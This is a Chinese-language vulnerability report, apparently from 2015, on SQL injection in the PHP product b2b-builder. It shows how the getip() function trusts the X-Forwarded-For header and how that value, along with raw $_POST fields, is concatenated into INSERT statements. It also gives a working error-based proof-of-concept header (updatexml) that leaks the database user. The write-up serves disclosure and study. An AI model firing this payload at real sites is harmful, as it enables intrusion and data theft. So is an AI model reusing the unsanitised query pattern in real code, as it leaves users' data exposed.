b2b-builder 多处SQL注入漏洞
代码分析
比较经典的xff sqli注入。b2bbuilder在有做addslash。但是获取ip的函数如下:
function getip()
{
if (isset($_SERVER)) {
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$realip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {
$realip = $_SERVER['HTTP_CLIENT_IP'];
} else {
$realip = $_SERVER['REMOTE_ADDR'];
}
} else {
if (getenv("HTTP_X_FORWARDED_FOR")) {
$realip = getenv( "HTTP_X_FORWARDED_FOR");
} elseif (getenv("HTTP_CLIENT_IP")) {
$realip = getenv("HTTP_CLIENT_IP");
} else {
$realip = getenv("REMOTE_ADDR");
}
}
return $realip;
}
很多地方都是用该函数获取ip,并且拼接到sql中执行。比如login.php,regiester.php等。其他地方也有,因为同一个原因,所以没有一一测试。以注册为例。
$ip=getip();$ip=empty($ip)?NULL:$ip;
$nt=time();$regtime=date("Y-m-d H:i:s");
$db=new dba($config['dbhost'],$config['dbuser'],$config['dbpass'],$config['dbname'],$config['dbport']);
$sql="select * from ".ALLUSER." where user='$user' or email='$email'";
$db->query($sql);
if($db->num_rows())
die("User name is have");
//----------------
if(!empty($config['user_reg'])&&$config['user_reg']!=3)
$user_reg=$config['user_reg'];
elseif($config['user_reg']==3)
$user_reg=1;
else
$user_reg=2;
//----------------
$sql="insert into ".ALLUSER."
(user,password,ip,lastLoginTime,qq,msn,sex,mobile,position,email,country,regtime,statu,name)
values
('$user','".md5($pass)."','$ip','$nt','$_POST[qq]','$_POST[msn]','$_POST[sex]','$_POST[mobile]','$_POST[pos]','$email','$country','$regtime','$user_reg','$_POST[realname]')";
$re=$db->query($sql);
103行开始。获取ip最终进入了
insert into ".ALLUSER."
(user,password,ip,lastLoginTime,qq,msn,sex,mobile,position,email,country,regtime,statu,name)
values
('$user','".md5($pass)."','$ip','$nt','$_POST[qq]','$_POST[msn]','$_POST[sex]','$_POST[mobile]','$_POST[pos]','$email','$country','$regtime','$user_reg','$_POST[realname]')
测试修改xff为X-Forwarded-For: 1.1.1.1’,服务器返回:
insert into b2bbuilder_page_view
(url,ip,time,username,fileName)
values
('%2Fb2bbuilder%2Fregister.php','1.1.1.1'','2015-05-14 17:21:11','test','/b2bbuilder/register.php')You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2015-05-14 17:21:11','test','/b2bbuilder/register.php')' at line 4
漏洞利用
poc:X-Forwarded-For: 1.1.1.1’ or updatexml(1,concat(0x5c,user()),1) or ‘
insert into b2bbuilder_page_view
(url,ip,time,username,fileName)
values
('%2Fb2bbuilder%2Fregister.php','1.1.1.1' or updatexml(1,concat(0x5c,user()),1) or '','2015-05-14 19:27:43','test','/b2bbuilder/register.php')XPATH syntax error: '\root@localhost'